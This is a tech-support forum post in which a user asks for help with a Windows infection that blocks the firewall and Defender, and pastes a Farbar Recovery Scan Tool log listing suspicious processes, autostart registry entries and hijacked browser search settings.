
[Solved] Virus that blocks the Windows firewall and does all kinds of stuff

#1 By Mr Andersen 05/06/2018 - 23:40
I was just using the PC, minding my own business, when a virus installed itself that blocks the Windows firewall and Windows Defender, messes with uninstalling programs (it kind of gets in the way of it), and keeps installing a bunch of stuff, besides opening Internet Explorer tabs and setting it as the default browser. Can someone please help me?

Logs
FRST.txt
https://www.cjoint.com/c/HFglfaFL3wu
Addition.txt
https://www.cjoint.com/c/HFglgh6bicu
Logs in case the link expires
"FRST.txt"

Resultado do exame da Farbar Recovery Scan Tool (FRST) (x64) Versão: 03.06.2018
Executado por Alessandra (administrador) em ALESSANDRA-PC (06-06-2018 07:59:50)
Executando a partir de C:\Users\Alessandra\Desktop
Perfis Carregados: Alessandra (Perfis Disponíveis: Alessandra)
Platform: Windows 7 Professional Service Pack 1 (X64) Idioma: Português (Brasil)
Internet Explorer Versão 8 (Navegador padrão: Chrome)
Modo da Inicialização: Normal
Tutorial da Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processos (Whitelisted) =================

(Se uma entrada for incluída na fixlist, o processo será fechado. O arquivo não será movido.)

() C:\Program Files\5850f7899b7a00e77740675180ff5f97\eafeb516191690959119ed8371b79fca.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
(Autodesk Inc.) C:\Program Files (x86)\Autodesk\Autodesk Desktop App\AdAppMgrSvc.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe
(Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe
(Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe
() C:\ProgramData\Logic Cramble\set.exe
(TODO: ) C:\ProgramData\Kipolam\Kipolam.exe
() C:\ProgramData\PrefsSecure\Nettrans.exe
() C:\Program Files (x86)\HTC\Internet Pass-Through\PassThruSvr.exe
(pdfforge GmbH) C:\Program Files\PDF Architect 4\creator-ws.exe
(© pdfforge GmbH.) C:\ProgramData\pdfforge\PDF Architect 4 Manager\PDF Architect 4\Architect Manager.exe
(VoiceFive, Inc.) C:\Program Files (x86)\PremierOpinion\pmservice.exe
() C:\Windows\SysWOW64\SecUPDUtilSvc.exe
(Samsung Electronics CO., LTD.) C:\ProgramData\Samsung\SW Update Service\SWMAgent.exe
() C:\Users\Alessandra\AppData\Local\Temp\csrss\proxy\tor.exe
(GAS Tecnologia LTDA) C:\Program Files\Diebold\Warsaw\core.exe
() C:\Users\Alessandra\AppData\Local\Temp\csrss\proxy\obfs4proxy.exe
() C:\Program Files (x86)\WeatherTool\2.0.1.5000183\WeatherService.exe
() C:\Windows\windefender.exe
(VoiceFive, Inc.) C:\Program Files (x86)\PremierOpinion\pmropn.exe
(ShenZhen Enode Techology co,.Ltd) C:\Program Files (x86)\WeatherTool\2.0.1.5000183\weather_lite.exe
(Samsung Electronics CO., LTD.) C:\Program Files\Samsung\S Agent\CommonAgent.exe
(GAS Tecnologia LTDA) C:\Program Files\Diebold\Warsaw\core.exe
(VoiceFive, Inc.) C:\Program Files (x86)\PremierOpinion\pmropn32.exe
(VoiceFive, Inc.) C:\Program Files (x86)\PremierOpinion\pmropn64.exe
() C:\Users\Alessandra\AppData\Local\Temp\xmrig.exe
(Microsoft Corporation) C:\Windows\System32\taskmgr.exe
(5X) C:\Program Files (x86)\bf1o5vdufsa\VQ4R6SI3GUSCYUI.exe
(A.E.T. Europe B.V.) C:\Windows\System32\aetcrss1.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(ELAN Microelectronics Corp.) C:\Program Files\Elantech\ETDCtrl.exe
(Nero AG) C:\Program Files (x86)\Common Files\Ahead\Lib\NMBgMonitor.exe
(Microsoft Corporation) C:\Windows\System32\cmd.exe
(5X) C:\Program Files\XXWL8VTRHR\XXWL8VTRH.exe
( ) C:\Users\Alessandra\AppData\Roaming\fwpra3jae2a\5rdiqyozohf.exe
(Hdid ) C:\Users\Alessandra\AppData\Roaming\h2a4yahxqry\gje1ddkrsb3.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Integrated Clock Controller Service\ICCProxy.exe
(ADS5GG@D) C:\Program Files\DPGD3TU7OG\DPGD3TU7O.exe
() C:\Users\Alessandra\AppData\Local\Temp\is-5TP8H.tmp\5rdiqyozohf.tmp
(Nero AG) C:\Program Files (x86)\Common Files\Ahead\Lib\NMIndexStoreSvr.exe
(5X) C:\Program Files (x86)\bf1o5vdufsa\DW7TM.exe
() C:\Users\Alessandra\AppData\Local\Temp\is-S3C6D.tmp\gje1ddkrsb3.tmp
(EpicNet Inc.) C:\Users\Alessandra\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe
(Hdid ) C:\Users\Alessandra\AppData\Roaming\bmg5xaggxdy\4w2suwq3kyp.exe
(5X) C:\Program Files\1J8EIRX58C\LB3FQUZP1.exe
(Hdid ) C:\Users\Alessandra\AppData\Roaming\ytpzcu0tpuu\ydak1uysdro.exe
(ELAN Microelectronics Corp.) C:\Program Files\Elantech\ETDCtrlHelper.exe
(5X) C:\Program Files\D01R7PS11V\D01R7PS11.exe
(Hdid ) C:\Users\Alessandra\AppData\Roaming\kedvvl2dmyu\5dpz20uzgsy.exe
() C:\Users\Alessandra\AppData\Local\Temp\is-F31S8.tmp\4w2suwq3kyp.tmp
(Hdid ) C:\Users\Alessandra\AppData\Roaming\mylj0dzpmis\imjsul3e1mv.exe
(Nero AG) C:\Program Files (x86)\Common Files\Ahead\Lib\NMIndexingService.exe
() C:\Users\Alessandra\AppData\Local\Temp\is-QTJFQ.tmp\ydak1uysdro.tmp
(5X) C:\Program Files\X4NT86L8PB\ATU8G5R9O.exe
(Hdid ) C:\Users\Alessandra\AppData\Roaming\sigqcdae4vw\30pkxk0pivi.exe
() C:\Users\Alessandra\AppData\Local\Temp\is-U3PGO.tmp\5dpz20uzgsy.tmp
(5X) C:\Program Files\F20NRXHM4L\1D0IR75AM.exe
(Hdid ) C:\Users\Alessandra\AppData\Roaming\bvohckxrv4t\1h11oowtwfi.exe
() C:\Users\Alessandra\AppData\Local\Temp\is-RPQ8E.tmp\imjsul3e1mv.tmp
(5X) C:\Program Files\22F4FU47HD\22F4FU47H.exe
() C:\Windows\Samsung\PanelMgr\SSMMgr.exe
() C:\Users\Alessandra\AppData\Local\Temp\is-4PDJ2.tmp\1h11oowtwfi.tmp
(Hewlett-Packard) C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe
() C:\Users\Alessandra\AppData\Local\Temp\is-4PDJ1.tmp\30pkxk0pivi.tmp
(WhiteClick) C:\Users\Alessandra\AppData\Local\WhiteClick\Start.exe
() C:\Windows\Samsung\PanelMgr\caller64.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Autodesk, Inc.) C:\Program Files (x86)\Autodesk\Autodesk Desktop App\AutodeskDesktopApp.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Autodesk) C:\Program Files (x86)\Autodesk\Autodesk Desktop App\AcWebBrowser\acwebbrowser.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(HP Inc.) C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Autodesk) C:\Program Files (x86)\Autodesk\Autodesk Desktop App\AcWebBrowser\acwebbrowser.exe
(HP Inc.) C:\Program Files\HP\HP Touchpoint Analytics Client\TouchpointAnalyticsClientService.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

==================== Registro (Whitelisted) ===========================

(Se uma entrada for incluída na fixlist, o ítem no Registro será restaurado para o padrão ou removido. O arquivo não será movido.)

HKLM\...\Run: [CertificateRegistration] => C:\Windows\system32\aetcrss1.exe [25600 2013-03-04] (A.E.T. Europe B.V.)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [508128 2016-07-01] (Adobe Systems Incorporated)
HKLM\...\Run: [ETDCtrl] => C:\Program Files\Elantech\ETDCtrl.exe [3274056 2013-11-25] (ELAN Microelectronics Corp.)
HKLM\...\Run: [AdobeGCInvoker-1.0] => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [316392 2018-05-11] (Adobe Systems, Incorporated)
HKLM-x32\...\Run: [Samsung PanelMgr] => C:\Windows\Samsung\PanelMgr\ssmmgr.exe [618496 2010-10-28] ()
HKLM-x32\...\Run: [HP Software Update] => C:\Program Files (x86)\Hp\HP Software Update\HPWuSchd2.exe [96056 2013-05-30] (Hewlett-Packard)
HKLM-x32\...\Run: [Adobe Creative Cloud] => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe [2384984 2016-12-09] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [Discord] => C:\ProgramData\SquirrelMachineInstalls\Discord.exe [54332920 2017-09-02] (Discord Inc.)
HKLM-x32\...\Run: [Autodesk Desktop App] => C:\Program Files (x86)\Autodesk\Autodesk Desktop App\AutodeskDesktopApp.exe [704424 2017-06-15] (Autodesk, Inc.)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [588704 2018-03-28] (Oracle Corporation)
HKLM-x32\...\Run: [Speedycar] => C:\Program Files (x86)\Speedycar\Speedycar.exe [18136576 2018-01-02] ()
HKLM\...\RunOnce: [OMEWPRODUCT_2UIFV] => C:\Program Files (x86)\bf1o5vdufsa\VQ4R6SI3GUSCYUI.exe [52224 2018-06-05] (5X) <==== ATENÇÃO
HKLM\...\RunOnce: [pob3s0h3rht] => C:\Program Files (x86)\io\463325.exe [671232 2018-06-05] ()
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restrição <==== ATENÇÃO
HKU\S-1-5-21-1322778411-14668823-402750941-1000\...\Run: [BgMonitor_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}] => C:\Program Files (x86)\Common Files\Ahead\Lib\NMBgMonitor.exe [143360 2006-12-23] (Nero AG)
HKU\S-1-5-21-1322778411-14668823-402750941-1000\...\Run: [Web Companion] => C:\Program Files (x86)\Lavasoft\Web Companion\Application\WebCompanion.exe --minimize
HKU\S-1-5-21-1322778411-14668823-402750941-1000\...\Run: [Akamai NetSession Interface] => "C:\Users\Alessandra\AppData\Local\Akamai\netsession_win.exe"
HKU\S-1-5-21-1322778411-14668823-402750941-1000\...\Run: [Autodesk Sync] => C:\Program Files\Autodesk\Autodesk Sync\AdSync.exe [1283112 2016-02-02] (Autodesk, Inc.)
HKU\S-1-5-21-1322778411-14668823-402750941-1000\...\Run: [SilentViolet] => C:\Windows\rss\csrss.exe [3224064 2018-06-05] () <==== ATENÇÃO
HKU\S-1-5-21-1322778411-14668823-402750941-1000\...\Run: [S6AKIFRRVSEQT13] => C:\Program Files\XXWL8VTRHR\XXWL8VTRH.exe [666624 2018-06-05] (5X)
HKU\S-1-5-21-1322778411-14668823-402750941-1000\...\Run: [3872389] => C:\Users\Alessandra\AppData\Roaming\h2a4yahxqry\gje1ddkrsb3.exe [534894 2018-06-05] (Hdid )
HKU\S-1-5-21-1322778411-14668823-402750941-1000\...\Run: [KMN2V7EI8ZVJBR3] => C:\Program Files (x86)\bf1o5vdufsa\DW7TM.exe [666624 2018-06-05] (5X)
HKU\S-1-5-21-1322778411-14668823-402750941-1000\...\Run: [CloudNet] => C:\Users\Alessandra\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [680960 2018-06-05] (EpicNet Inc.) <==== ATENÇÃO
HKU\S-1-5-21-1322778411-14668823-402750941-1000\...\Run: [8703607] => C:\Users\Alessandra\AppData\Roaming\bmg5xaggxdy\4w2suwq3kyp.exe [534894 2018-06-05] (Hdid )
HKU\S-1-5-21-1322778411-14668823-402750941-1000\...\Run: [8Y5UZRHXRFXAQOK] => C:\Program Files\1J8EIRX58C\LB3FQUZP1.exe [666624 2018-06-05] (5X)
HKU\S-1-5-21-1322778411-14668823-402750941-1000\...\Run: [3659841] => C:\Users\Alessandra\AppData\Roaming\ytpzcu0tpuu\ydak1uysdro.exe [534894 2018-06-05] (Hdid )
HKU\S-1-5-21-1322778411-14668823-402750941-1000\...\Run: [BI73TEID5O9F6QJ] => C:\Program Files\D01R7PS11V\D01R7PS11.exe [666624 2018-06-05] (5X)
HKU\S-1-5-21-1322778411-14668823-402750941-1000\...\Run: [9994632] => C:\Users\Alessandra\AppData\Roaming\kedvvl2dmyu\5dpz20uzgsy.exe [534894 2018-06-05] (Hdid )
HKU\S-1-5-21-1322778411-14668823-402750941-1000\...\Run: [9485984] => C:\Users\Alessandra\AppData\Roaming\mylj0dzpmis\imjsul3e1mv.exe [534894 2018-06-05] (Hdid )
HKU\S-1-5-21-1322778411-14668823-402750941-1000\...\Run: [1YLHJZWZQ4EUJEB] => C:\Program Files\X4NT86L8PB\ATU8G5R9O.exe [666624 2018-06-05] (5X)
HKU\S-1-5-21-1322778411-14668823-402750941-1000\...\Run: [8314470] => C:\Users\Alessandra\AppData\Roaming\sigqcdae4vw\30pkxk0pivi.exe [534894 2018-06-05] (Hdid )
HKU\S-1-5-21-1322778411-14668823-402750941-1000\...\Run: [SWR364A0TBPNGLR] => C:\Program Files\F20NRXHM4L\1D0IR75AM.exe [666624 2018-06-05] (5X)
HKU\S-1-5-21-1322778411-14668823-402750941-1000\...\Run: [4093497] => C:\Users\Alessandra\AppData\Roaming\bvohckxrv4t\1h11oowtwfi.exe [534894 2018-06-05] (Hdid )
HKU\S-1-5-21-1322778411-14668823-402750941-1000\...\Run: [B18WJ9MV5BSPEJ6] => C:\Program Files\22F4FU47HD\22F4FU47H.exe [666624 2018-06-05] (5X)
HKU\S-1-5-21-1322778411-14668823-402750941-1000\...\Run: [8272955] => C:\Users\Alessandra\AppData\Roaming\fwpra3jae2a\5rdiqyozohf.exe [735941 2018-06-06] ( )
HKU\S-1-5-21-1322778411-14668823-402750941-1000\...\Run: [WRK07J3DVX52BTM] => C:\Program Files\DPGD3TU7OG\DPGD3TU7O.exe [666624 2018-06-06] (ADS5GG@D)
HKU\S-1-5-21-1322778411-14668823-402750941-1000\...\Policies\Explorer: []
HKU\S-1-5-21-1322778411-14668823-402750941-1000\...\MountPoints2: {7dd37410-93cc-11e6-90a6-50b7c3c6601c} - E:\AutoRun.exe "motorola.html"
HKU\S-1-5-21-1322778411-14668823-402750941-1000\...\MountPoints2: {88d87ecb-b33b-11e5-9517-50b7c3c6601c} - E:\LGAutoRun.exe
HKU\S-1-5-18\...\Run: [Web Companion] => C:\Program Files (x86)\Lavasoft\Web Companion\Application\WebCompanion.exe --minimize
HKU\S-1-5-18\...\Run: [Autodesk Sync] => C:\Program Files\Autodesk\Autodesk Sync\AdSync.exe [1283112 2016-02-02] (Autodesk, Inc.)
HKU\S-1-5-18\...\RunOnce: [SPReview] => "C:\Windows\System32\SPReview\SPReview.exe" /sp:1 /errorfwlink:"hxxp://go.microsoft.com/fwlink/?LinkID=122915" /build:7601
AppInit_DLLs: C:\ProgramData\Kipolam\Fasehold.dll => C:\ProgramData\Kipolam\Fasehold.dll [342528 2018-06-05] ()
AppInit_DLLs-x32: C:\ProgramData\Kipolam\InJob.dll => C:\ProgramData\Kipolam\InJob.dll [460800 2018-06-05] ()
SSODL: EldosMountNotificator - {5FF49FE8-B332-4CB9-B102-FB6951629E55} - C:\Windows\system32\CbFsMntNtf3.dll (EldoS Corporation)
SSODL-x32: EldosMountNotificator - {5FF49FE8-B332-4CB9-B102-FB6951629E55} - C:\Windows\SysWOW64\CbFsMntNtf3.dll (EldoS Corporation)
ShellExecuteHooks: Sem Nome - {BFD98515-CD74-48A4-98E2-13D209E3EE4F} - C:\Windows\System32\mcicda64.dll [2990080 2018-03-24] ()
Startup: C:\Users\Alessandra\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Shortcut to Primary output from Start (Active).lnk [2018-06-05]
ShortcutTarget: Shortcut to Primary output from Start (Active).lnk -> C:\Users\Alessandra\AppData\Roaming\Microsoft\Installer\{D66F6F24-652D-4405-A0D3-C568F825FE66}\_76328BABB32558415FD627.exe ()
GroupPolicy: Restrição - Chrome <==== ATENÇÃO
CHR HKLM\SOFTWARE\Policies\Google: Restrição <==== ATENÇÃO

==================== Internet (Whitelisted) ====================

(Se um ítem for incluído na fixlist, sendo um ítem do Registro, será removido ou restaurado para o padrão.)

Hosts: Há mais de uma entrada no Hosts. Veja a seção Hosts do Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.15.1
Tcpip\..\Interfaces\{3880F638-1B59-4D35-A275-8EE9B685104D}: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{BC629E5C-C9A6-4E4C-9EAC-D2E12FE32030}: [DhcpNameServer] 192.168.15.1

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://br.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_bxinw_17_21&param1=1&param2=f%3D1%26b%3DIE%26cc%3Dbr%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1QzuyDtD0ByB0CtA0CyCyCtDtC0Czz0CyEtBtN0D0Tzu0StCzyyBtCtN1L2XzutAtFtBzytFtAtFyByDtN1L1Czu1TtN1L1G1B1V1N2Y1L1Qzu2StDtD0B0CyByEtA0CtGtByCyC0DtGtCyE0EyBtGyBtCzztAtG0A0E0EtDtBtD0C0A0BtDyCyB2QtN1M1F1B2Z1V1N2Y1L1Qzu2StAyDtDtAzytC0AtBtGtAyC0E0CtGyEtBzz0DtGzz0CtCyBtG0F0DyBtB0F0D0F0DyByDyDtA2QtN0A0LzuyE%26cr%3D1752191025%26a%3Dwncy_bxinw_17_21%26os_ver%3D6.1%26os%3DWindows%2B7%2BProfessional
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxps://br.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_bxinw_17_21&param1=1&param2=f%3D1%26b%3DIE%26cc%3Dbr%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1QzuyDtD0ByB0CtA0CyCyCtDtC0Czz0CyEtBtN0D0Tzu0StCzyyBtCtN1L2XzutAtFtBzytFtAtFyByDtN1L1Czu1TtN1L1G1B1V1N2Y1L1Qzu2StDtD0B0CyByEtA0CtGtByCyC0DtGtCyE0EyBtGyBtCzztAtG0A0E0EtDtBtD0C0A0BtDyCyB2QtN1M1F1B2Z1V1N2Y1L1Qzu2StAyDtDtAzytC0AtBtGtAyC0E0CtGyEtBzz0DtGzz0CtCyBtG0F0DyBtB0F0D0F0DyByDyDtA2QtN0A0LzuyE%26cr%3D1752191025%26a%3Dwncy_bxinw_17_21%26os_ver%3D6.1%26os%3DWindows%2B7%2BProfessional
HKU\S-1-5-21-1322778411-14668823-402750941-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBHN80V5Qf4-sHSpwfvpaW-8yPGbWMrvJ6yLVfkroXUJ4MnSpD2UIf_GvoOZX4IaE544WiJbUw4iwVwLgiKuIyq-xD5UwOxMMeTBFvGVOtfL0DOCuIUm6tTqtM8oPXNWl4Ab_RnHfNjunQ6XH9vlS-5hx2xQwe5_cXmRv2i_mLieyJSckFaWSM,&q={searchTerms}
HKU\S-1-5-21-1322778411-14668823-402750941-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBHN80V5Qf4-sHSpwfvpaW-8yPGbWMrvJ6yLVfkroXUJ4MnSpD2UIf_GvoOZX4IaE544WiJbUw4iwVwLgiKuIyq-xD5X1PSSGRFE7C0CY8d5RznzVJED9kXfb-LxU-ujG2jkjHebgauFvGg_1XDweDAcaAR813YtNxMwVz2uyRGbhw9ilsvE3c,
HKU\S-1-5-21-1322778411-14668823-402750941-1000\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/pt-br/?ocid=iehp
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://br.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_bxinw_17_21&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dbr%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1QzuyDtD0ByB0CtA0CyCyCtDtC0Czz0CyEtBtN0D0Tzu0StCzyyBtCtN1L2XzutAtFtBzytFtAtFyByDtN1L1Czu1TtN1L1G1B1V1N2Y1L1Qzu2StDtD0B0CyByEtA0CtGtByCyC0DtGtCyE0EyBtGyBtCzztAtG0A0E0EtDtBtD0C0A0BtDyCyB2QtN1M1F1B2Z1V1N2Y1L1Qzu2StAyDtDtAzytC0AtBtGtAyC0E0CtGyEtBzz0DtGzz0CtCyBtG0F0DyBtB0F0D0F0DyByDyDtA2QtN0A0LzuyE%26cr%3D1752191025%26a%3Dwncy_bxinw_17_21%26os_ver%3D6.1%26os%3DWindows%2B7%2BProfessional&p={searchTerms}
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://br.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_bxinw_17_21&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dbr%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1QzuyDtD0ByB0CtA0CyCyCtDtC0Czz0CyEtBtN0D0Tzu0StCzyyBtCtN1L2XzutAtFtBzytFtAtFyByDtN1L1Czu1TtN1L1G1B1V1N2Y1L1Qzu2StDtD0B0CyByEtA0CtGtByCyC0DtGtCyE0EyBtGyBtCzztAtG0A0E0EtDtBtD0C0A0BtDyCyB2QtN1M1F1B2Z1V1N2Y1L1Qzu2StAyDtDtAzytC0AtBtGtAyC0E0CtGyEtBzz0DtGzz0CtCyBtG0F0DyBtB0F0D0F0DyByDyDtA2QtN0A0LzuyE%26cr%3D1752191025%26a%3Dwncy_bxinw_17_21%26os_ver%3D6.1%26os%3DWindows%2B7%2BProfessional&p={searchTerms}
SearchScopes: HKLM-x32 -> DefaultScope {ielnksrch} URL =
SearchScopes: HKLM-x32 -> ielnksrch URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBHN80V5Qf4-sHSpwfvpaW-8yPGbWMrvJ6yLVfkroXUJ4MnSpD2UIf_GvoOZX4IaE544WiJbUw4iwVwLgiKuIyq-xD5UwOxMMeTBFvGVOtfL0DOCuIUm6tTqtM8oPXNWl4Ab_RnHfNjunQ6XH9vlS-5hx2xQwe5_cXmRv2i_mLieyJSckFaWSM,&q={searchTerms}
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://br.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_bxinw_17_21&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dbr%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1QzuyDtD0ByB0CtA0CyCyCtDtC0Czz0CyEtBtN0D0Tzu0StCzyyBtCtN1L2XzutAtFtBzytFtAtFyByDtN1L1Czu1TtN1L1G1B1V1N2Y1L1Qzu2StDtD0B0CyByEtA0CtGtByCyC0DtGtCyE0EyBtGyBtCzztAtG0A0E0EtDtBtD0C0A0BtDyCyB2QtN1M1F1B2Z1V1N2Y1L1Qzu2StAyDtDtAzytC0AtBtGtAyC0E0CtGyEtBzz0DtGzz0CtCyBtG0F0DyBtB0F0D0F0DyByDyDtA2QtN0A0LzuyE%26cr%3D1752191025%26a%3Dwncy_bxinw_17_21%26os_ver%3D6.1%26os%3DWindows%2B7%2BProfessional&p={searchTerms}
SearchScopes: HKU\S-1-5-21-1322778411-14668823-402750941-1000 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://br.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_bxinw_17_21&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dbr%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1QzuyDtD0ByB0CtA0CyCyCtDtC0Czz0CyEtBtN0D0Tzu0StCzyyBtCtN1L2XzutAtFtBzytFtAtFyByDtN1L1Czu1TtN1L1G1B1V1N2Y1L1Qzu2StDtD0B0CyByEtA0CtGtByCyC0DtGtCyE0EyBtGyBtCzztAtG0A0E0EtDtBtD0C0A0BtDyCyB2QtN1M1F1B2Z1V1N2Y1L1Qzu2StAyDtDtAzytC0AtBtGtAyC0E0CtGyEtBzz0DtGzz0CtCyBtG0F0DyBtB0F0D0F0DyByDyDtA2QtN0A0LzuyE%26cr%3D1752191025%26a%3Dwncy_bxinw_17_21%26os_ver%3D6.1%26os%3DWindows%2B7%2BProfessional&p={searchTerms}
SearchScopes: HKU\S-1-5-21-1322778411-14668823-402750941-1000 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://br.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_bxinw_17_21&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dbr%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1QzuyDtD0ByB0CtA0CyCyCtDtC0Czz0CyEtBtN0D0Tzu0StCzyyBtCtN1L2XzutAtFtBzytFtAtFyByDtN1L1Czu1TtN1L1G1B1V1N2Y1L1Qzu2StDtD0B0CyByEtA0CtGtByCyC0DtGtCyE0EyBtGyBtCzztAtG0A0E0EtDtBtD0C0A0BtDyCyB2QtN1M1F1B2Z1V1N2Y1L1Qzu2StAyDtDtAzytC0AtBtGtAyC0E0CtGyEtBzz0DtGzz0CtCyBtG0F0DyBtB0F0D0F0DyByDyDtA2QtN0A0LzuyE%26cr%3D1752191025%26a%3Dwncy_bxinw_17_21%26os_ver%3D6.1%26os%3DWindows%2B7%2BProfessional&p={searchTerms}
SearchScopes: HKU\S-1-5-21-1322778411-14668823-402750941-1000 -> {B558FF02-7E0B-4BFF-B740-6C09BA8781E1} URL = hxxps://br.search.yahoo.com/search?fr=chr-greentree_ie&ei=utf-8&ilc=12&type=502468&p={searchTerms}
SearchScopes: HKU\S-1-5-21-1322778411-14668823-402750941-1000 -> {C0C3A6C6-03BC-4195-8FCB-AEA091301353} URL = hxxps://br.search.yahoo.com/yhs/search?hspart=lvs&hsimp=yhs-awc&type=lvs__webcompa__1_0__ya__ch_WCYID10301__161124__yaie&p={searchTerms}
SearchScopes: HKU\S-1-5-21-1322778411-14668823-402750941-1000 -> {ielnksrch} URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBHN80V5Qf4-sHSpwfvpaW-8yPGbWMrvJ6yLVfkroXUJ4MnSpD2UIf_GvoOZX4IaE544WiJbUw4iwVwLgiKuIyq-xD5UwOxMMeTBFvGVOtfL0DOCuIUm6tTqtM8oPXNWl4Ab_RnHfNjunQ6XH9vlS-5hx2xQwe5_cXmRv2i_mLieyJSckFaWSM,&q={searchTerms}
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\Office15\OCHelper.dll [2015-11-18] (Microsoft Corporation)
BHO: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_171\bin\ssv.dll [2018-04-27] (Oracle Corporation)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office15\URLREDIR.DLL [2014-01-23] (Microsoft Corporation)
BHO: YoutubeAdBlock -> {C0D38E5A-7CF8-4105-8FE8-31B81443A114} -> C:\Program Files (x86)\lJFUJMGEHIE\tjOwysmM4.dll [2018-06-05] ()
BHO: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office\Office15\GROOVEEX.DLL [2015-11-10] (Microsoft Corporation)
